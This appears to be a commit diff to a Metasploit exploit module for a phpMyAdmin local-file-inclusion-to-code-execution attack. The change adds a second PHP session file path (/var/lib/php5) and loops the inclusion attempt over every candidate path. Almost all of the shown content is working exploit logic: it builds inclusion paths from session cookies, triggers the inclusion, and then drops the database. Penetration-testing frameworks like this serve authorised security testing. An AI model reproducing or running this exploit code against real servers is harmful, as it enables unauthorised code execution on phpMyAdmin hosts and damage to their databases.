Land #10487, add php5 session file target

modules/exploits/multi/http/phpmyadmin_lfi_rce.rb

@@ -211,19 +211,22 @@ def exploit
       fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
     end
 
+    paths = []
     #Creating include path
     if mytarget == 'Windows'
       #Table file location
-      data_path = $1.gsub(/\\/, '/')
-      data_path = data_path.sub(/^.*?\//, '/')
-      data_path << "#{database}/#{table}.frm"
+      tmp_path = $1.gsub(/\\/, '/')
+      tmp_path = tmp_path.sub(/^.*?\//, '/')
+      tmp_path << "#{database}/#{table}.frm"
+      paths.append(tmp_path)
     else
       #Session path location
       /phpMyAdmin=(?<session_name>.*?);/ =~ cookies
-      data_path = "/var/lib/php/sessions/sess_#{session_name}"
+      paths.append("/var/lib/php/sessions/sess_#{session_name}")
+      paths.append("/var/lib/php5/sess_#{session_name}")
     end
 
-    res = lfi(uri, data_path, cookies, token)
+    paths.each {|data_path| lfi(uri, data_path, cookies, token)}
 
     #Drop database
     res = query(uri, dropsql, cookies, token)